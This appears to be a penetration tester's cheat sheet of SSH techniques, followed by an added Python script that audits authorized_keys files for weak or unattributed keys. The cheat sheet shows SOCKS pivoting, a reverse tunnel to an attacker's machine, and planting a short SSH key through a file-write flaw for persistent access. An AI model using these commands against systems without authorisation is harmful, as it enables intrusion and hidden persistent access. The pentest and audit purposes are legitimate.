Last active August 31, 2021 14:56
ssh kung fu
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:<local-port> that lets you pivot through the remote host (<remote-host>).
#Command line (replace the <...> placeholders):
ssh -D <local-port> <user>@<remote-host>
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from <remote-host>:
tsocks rdesktop <target-host>
##SSH Remote Forward##
#The SSH server will be able to access TCP port 80 on <client-side-host> (a host accessible from the SSH client) by connecting to 127.0.0.1:<server-port> on the SSH server.
#Command line (replace the <...> placeholders):
ssh -R <server-port>:<client-side-host>:80 <user>@<ssh-server>
#Opens a tunnel to <target-host> on port 80 when you connect to your localhost on 8080 -- 443 is the port ssh is running on the attacking machine.
ssh -l ryan -R 8080:<target-host>:80 -v -p 443 <attacking-machine>
##SSH authorized_keys##
#During a pentest or audit, you might want to add an authorized_keys file to let you log in using an SSH key.
#The authorized_keys file lives in a user’s home directory on the SSH server. It holds the public keys of the users allowed to log into that user’s account.
#Generate a public/private key pair like this:
ssh-keygen -f mykey
cat mykey.pub # you can copy this to authorized_keys
#If you want the shortest possible key (because your arbitrary-file-write vector is limited), do this:
ssh-keygen -f mykey -t rsa -b 768
#Note that current OpenSSH refuses RSA keys shorter than 1024 bits (both when generating and when authenticating), so a 768-bit key only works against old servers.
cat mykey.pub # copy to authorized_keys. Omit the trailing user@host comment if you need a shorter key.
#Connect to the target system like this (you need to know the username of the user you added an authorized key for):
ssh -i mykey user@<target-host>
#Caveat: The authorized_keys file will be ignored if it’s writable by other users: sshd’s StrictModes (on by default) rejects a group- or world-writable authorized_keys file or ~/.ssh directory. If you already have shell access you can “chmod 600 ~/.ssh/authorized_keys”. However, if you’re remotely exploiting an arbitrary file-write vulnerability and happen to have a weak umask, you may have problems.
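As an added defensive counterpart (example code, not part of the original gist): a small Python audit that parses authorized_keys entries, measures the RSA modulus so the 768-bit trick above gets flagged, reports keys with no attributing comment, and checks for the group/world-writable mode bits that StrictModes rejects. The key encoder and sample lines are constructed for the example, and MIN_RSA_BITS is an assumed policy threshold.

```python
import base64
import stat
import struct

MIN_RSA_BITS = 2048  # assumed policy threshold; the 768-bit trick above falls far below it
def _read_string(blob, off):  # one length-prefixed SSH wire string starting at byte offset off
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def encode_rsa_pubkey(e, n):  # base64 body of an ssh-rsa key; used only to construct sample input
    def mpint(x):  # big-endian with a spare leading byte, so the sign bit is never set
        b = x.to_bytes((x.bit_length() + 8) // 8, "big")
        return struct.pack(">I", len(b)) + b
    return base64.b64encode(struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)).decode()

def rsa_modulus_bits(b64):
    """Bit length of the modulus in an ssh-rsa key body; None for other key types."""
    blob = base64.b64decode(b64)
    keytype, off = _read_string(blob, 0)
    if keytype != b"ssh-rsa":
        return None
    _e, off = _read_string(blob, off)  # public exponent, not needed here
    n, _ = _read_string(blob, off)
    return int.from_bytes(n, "big").bit_length()

def audit_lines(lines):
    """Return (line_no, message) findings for weak or unattributable authorized_keys entries."""
    findings = []
    for num, line in enumerate(lines, 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options such as from="..." may precede the key type, so locate the type field first.
        idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(fields):
            findings.append((num, "unparseable entry"))
            continue
        if fields[idx] == "ssh-rsa":
            bits = rsa_modulus_bits(fields[idx + 1])
            if bits is not None and bits < MIN_RSA_BITS:
                findings.append((num, f"{bits}-bit RSA key, below {MIN_RSA_BITS}"))
        if len(fields) == idx + 2:
            findings.append((num, "no comment: key cannot be attributed to an owner"))
    return findings

def mode_findings(st_mode):  # mode bits that make sshd's StrictModes reject an authorized_keys file
    return [m for f, m in ((stat.S_IWGRP, "group-writable"), (stat.S_IWOTH, "world-writable")) if st_mode & f]

# Constructed sample "file": a 768-bit key with a comment and a 2048-bit key without one.
SAMPLE_LINES = ["ssh-rsa " + encode_rsa_pubkey(65537, (1 << 767) | 1) + " ryan@attack",
                "ssh-rsa " + encode_rsa_pubkey(65537, (1 << 2047) | 1)]
```

Run audit_lines over the real file's lines and mode_findings over os.stat(path).st_mode to audit a live account.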